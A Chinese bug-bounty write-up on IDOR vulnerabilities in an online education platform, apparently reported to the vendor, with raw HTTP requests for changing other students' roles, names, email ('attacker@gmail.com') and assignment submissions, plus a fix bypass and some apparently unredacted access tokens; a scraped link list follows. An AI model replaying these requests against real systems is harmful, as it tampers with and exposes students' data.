挖洞经验知名在线教育平台的IDOR漏洞

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

简单对目标网站xyz.com做个介绍:它是一个在线教育平台,主要提供政治/媒体/历史等方面的培训,其中内置分组聊天功能,几乎全球著名的大学都使用了该平台为在校学生进行辅导教学。在前端应用中,教师(管理者admin)通过创建课程,然后邀请学生(低权限用户)加入课程学习。整个在线教学过程中,将有讨论、作业指导以及课题项目等分类。

首先是,在前端接口服务的讨论分组功能中,存在学生角色可更改的IDOR漏洞,其角色更改请求如下:

PATCH/api/api/v1.0/lesson/26201/student_roles/224410HTTP/1.1

Host:xyz.com

User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:64.0)Gecko/20100101Firefox/64.0

Accept:application/json

Accept-Language:en-US,en;q=0.5

Accept-Encoding:gzip,deflate

Access-Token:[REDUCTED]

Content-Type:application/json;charset=utf-8

Content-Length:43

Connection:close

Cookie:visid_incap_633468=RCwAKw4IRCegxMVVw4Wx+6

{"student_id":"40990","role_guide_id":"22"}

这里存在两个参数,一个是课程管理员ID(ClassadminID)26201,另一个是学生角色ID(StudentRoleID)224410,有点奇怪的是,这个学生角色ID和请求内容中的student_id号40990有关联。所以,如果我们以某个student_id号假设48990为目标,保持课程管理员ID26201不变,通过在一定范围内枚举猜测其学生角色ID(StudentRoleID),这样的话我们完全有可能得到其对应的学生角色ID(StudentRoleID),最终可实现对该生的课程角色变化,如从课程中删除或添加到其它课程等操作。

之后,我又用此方法发现了另外一个请求中的IDOR漏洞:

PATCH/api/api/v1.0/user_resource/student/[VictimId40994]HTTP/1.1

User-Agent:Mozilla/5.0

Access-Token:[]

Content-Length:48

Cookie:[CookieReducted]

{"first_name":"john","last_name":"wick"}

在该请求中,通过改变学生的ID号VictimId,结合请求体中的姓和名的内容,我们就能更改VictimId对应学生的姓名信息,原始请求中只有"first_name"和"last_name"参数,之后,我又尝试增加了一个“email”参数,组成以下请求:

{"first_name":"baba","last_name":"yaga","email":"attacker@gmail.com"}

其次,在学生作业提交请求中也存在IDOR漏洞,作业提交请求如下:

POST/api/api/v1.0/lesson/26201/assessment_answerHTTP/1.1

Content-Length:778

Access-Token:9LgDXO27k1-yScnlUuo_gY5AKIG80y0IvTeCxa2KeZQ

User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/72.0.3626.96Safari/537.36

Content-Type:application/json;charset=UTF-8

Accept-Language:en-US,en;q=0.9

Cookie:[]

{"title":"Assignment","student":"40994","section_id":"case","completed":false,"lesson":"26201","assignment":"4579","answers":[{"field_answer":"hello","field_question_ref":"4569"},"file_url":"5830"}

在上述请求中可以看到,其file_url为数据型的,通过更改其中的数值就能把其他学生的提交作业变成我的提交作业了,同时还能看到其他学生的作业信息,如下:

HTTP/1.1200OK

Accept-Ranges:bytes

Age:0

Cache-Control:no-cache,must-revalidate

Date:Sun,12May201918:01:07GMT

Expires:Sun,19Nov197805:00:00GMT

Server:Apache/2.2.15(RedHat)

Vary:Accept

Via:1.1varnish

WebServer:prod1-md

X-API-Version:v1.0

X-Cache:MISS

X-Content-Type-Options:nosniff

X-Drupal-Cache:MISS

X-Powered-By:PHP/7.1.23

X-Varnish:762262632

Content-Length:1465

Connection:Close

X-Iinfo:14-119388817-119389061NNNNCT(000)RT(15576840601441031)q(000-1)r(5555)U6

X-CDN:Incapsula

在发现以上漏洞后,我及时提交给了厂商,当漏洞修复完成时,我在复测时,又发现了上面这个作业提交请求中还仍然存在IDOR漏洞。修复后的作业提交请求如下:

PATCH/api/api/v1.0/lesson/30699/assessment_answer/30709HTTP/1.1

User-Agent:Mozilla/5.0(X11;Linuxx86_64;rv:60.0)Gecko/20100101Firefox/60.0

Access-Token:HNg-F0wiTIrxDtc1qDQL2TjHv-ERroxmIowIUkM8Blo

Content-Length:1206

Cookie:[REDUCTED]

{"completed":true,"answers":[{"field_answer":"xyz.burpcollaborator.net","[Reducted]:"xyz.burpcollaborator.net","field_question_ref":"139"}]}

可见,其中确实没有了file_url参数。在BurpSuite中的请求如下:

响应如下:

奇怪的是,响应内容中可以看到一个“file_url”:null名值对,所以,我又尝试在请求中添加进了“file_url”参数值,果然,还是和修复之前一样可以成功响应!所以最后的经验是,要学会从请求的响应中观察那些隐藏的参数。

THE END
1.在实施过程中中国学前教育网遇到了哪些挑战和问题随着科技的飞速发展,教育也逐渐向数字化转型。中国学前教育网是这一转变中的一个重要组成部分,它旨在通过网络平台为孩子们提供更好的学习资源和环境。然而,在这个过程中,不乏面临的一系列挑战和问题。 首先,从技术层面上来看,中国学前教育网需要依托于强大的信息基础设施。这包括高速宽带、稳定的服务器以及高效的数据存https://www.rglkxnles.cn/wu-shu/717286.html
2.在线教育面临多重挑战,揭示不容忽视的缺点信息咨询在线教育的一个显著缺点是其缺乏师生之间以及学生之间的面对面互动,尽管许多在线平台试图通过视频、语音聊天等功能模拟真实课堂环境,但线上交流仍无法替代真实的互动,研究表明,缺乏实时互动可能导致学生的学习动力下降,影响学习效果,面对面的交流对于培养学生的沟通能力和团队合作精神也至关重要。 http://4g.chengxue.net/post/17933.html
3.警惕伪AI给高考志愿填报挖坑埋雷其一,该类软件是真AI还是假噱头,涉及后台技术问题,界定困难;其二,软件推荐结果即使与实际录取结果差距很大,商家也可能将软件漏洞归结为录取分数改变等因素,借此开脱责任;其三,该类软件提供的类似“智库”服务,背后知识成分几何、定价标准该是多少,目前没有明确规定。上述问题也导致消费者维权困难。http://czwj.jsjc.gov.cn/zt/jianchashuoan/202412/t20241209_1682571.shtml
4.教育漏洞报告平台教育行业漏洞报告平台Beta白帽子问题交流与反馈QQ群:173990329。 近期某通用型建站系统高危漏洞被曝出,针对白帽子批量提交的情况,平台将酌情降低相关漏洞的等级与分值。 同一单位多处同类型漏洞,请打 包提交,方便校方进行对接和统一处理。 平台暂时只接收现有单位的安全问题,对范围之外的漏洞将暂时做忽略处理。 https://dev.src.sjtu.edu.cn/
5.为网络安全贡献一份力量,教育漏洞报告平台上报指南在这个信息爆炸的时代,信息技术的迅猛发展给我们带来了前所未有的便利,但与此同时,网络安全问题也如同潜藏在暗处的猛兽,时刻威胁着我们的信息安全。我写了一份教育漏洞平台上报指南,以确保大家能够快速、高效地报告漏洞。 教育漏洞报告平台 教育漏洞报告平台由上海交通大学管理,旨在服务全教育行业,汇聚多方力量,以提升各https://cloud.tencent.com/developer/article/2416988
6.漏洞复现漏洞描述 此教育视频云平台是一种教育技术解决方案,致力于提供高质量的在线教育视频服务。该平台为教育机构和教师提供了一个全面的视频管理和交流平台。它具有以下特点:首先,平台支持上传、存储和管理各种教育视频内容,包括课程录像、教学资源等。 fofa语句 https://blog.csdn.net/jjjj1029056414/article/details/134859437
7.智慧教育云平台存在任意用户登录漏洞安恒CERT漏洞编号: WM-202408-000097 漏洞详情:该漏洞允许攻击者通过修改URL中的参数来尝试登录系统中任意用户账户,违反了系统的访问控制,可能允许未经授权的访问或数据泄露。产品https://ti.dbappsecurity.com.cn/info/7048
8.教育行业漏洞报告平台教育行业漏洞报告平台 教育行业漏洞报告平台 网址预览https://www.hackjie.com/sites/1228.html
9.[经济信息联播]教育培训乱象培训贷平台审核存漏洞预付消费需谨慎[经济半小时]话术洗脑套路多 培训贷处处是陷阱 [面对面]勇敢者的表演 [中国好时节]打好治沙防沙攻坚战·新疆 沙漠守井人 守住绿色守好路 [客从海上来]第七届中国国际进口博览会今天闭幕 进博会持续赋能中非经贸合作 [今日环球]岛内期待奥运冠军马龙等人访台 舆论呼吁两岸加强交流 换一批央视https://tv.cctv.com/v/v2/VIDEIsKeBarTB3HdQ0ZoSojH200728.html
10.教育部职业院校数字校园规范当今社会,以互联网、大数据、云计算、物联网、人工智能、5G、VR/AR、区块链等信息技术为代表的科技革命对人类生活、工作、学习等各个方面产生了巨大的影响,在教育领域数字校园已成为办学的基本条件,特别是职业院校数字校园已成为支撑教育教学、沟通校企合作、促进师生发展的必需环境。 http://www.xtzy.com/wlzx/detail.jsp?public_id=153330
11.首页红日安全团队~专注信息安全在线教育平台漏洞挖掘实战 199元 难度:高级学习人数:625 Web安全入门到进阶实战 166元 难度:高级学习人数:655 Python渗透工具开发实战 399元 难度:高级学习人数:867 白帽秀 更多 白帽达人秀 免费 难度:初级学习人数:258 红日安全星火线上沙龙 免费 难度:高级学习人数:788http://www.qiyuanxuetang.net/
12.超过1.27亿用户的开源教育系统Moodle远程代码执行漏洞详情在这篇文章中,我们研究了Moodle中的一个关键漏洞。Moodle通常被集成到更大的系统中,加入WebMailer、eLearning平台和其他技术,形成一个具有共享帐户凭据的单一体系结构,该体系结构跨越一个巨大的攻击面,供未经身份验证的攻击者钓鱼或提取教师帐户的凭据。在某些情况下,有一种自动请求Moodle课程的服务,它可以利用学生的权https://www.anquanke.com/post/id/147950
13.2021央视315曝光多个线上黑幕,人脸简历都被泄露,还有7个数字据中消协介绍,消费者对“大数据杀熟”等问题投诉不断增多,问题的核心在于互联网平台对算法技术的应用,集中体现在推荐算法、价格算法、评价算法、排名算法、概率算法和流量算法等方面。 4.二手电商平台,漏洞频出 北京阳光消费大数据研究院数据显示,2020 年二手平台消费舆情信息共有 856873 条。其中,负面舆情信息超过一半http://acfe.iffsa-chfp.org/wap/hjnews/show_777.html
14.在线学习不用愁!云演在线信息安全教育平台改版上线!云演在线信息安全教育平台(简称云演)为四叶草安全旗下网安人才培养与创新研究中心结合信息安全人才市场需求,摒弃传统人才培养模式,以攻击者视角为核心,漏洞为学习对象,通过提升攻击能力促进防御体系的完善,为企事业单位、高校、白帽子等网络安全从业者和爱好者提供体系化的攻防知识学习、安全实验实操、最新漏洞验证、CTF竞赛https://www.seclover.com/new/337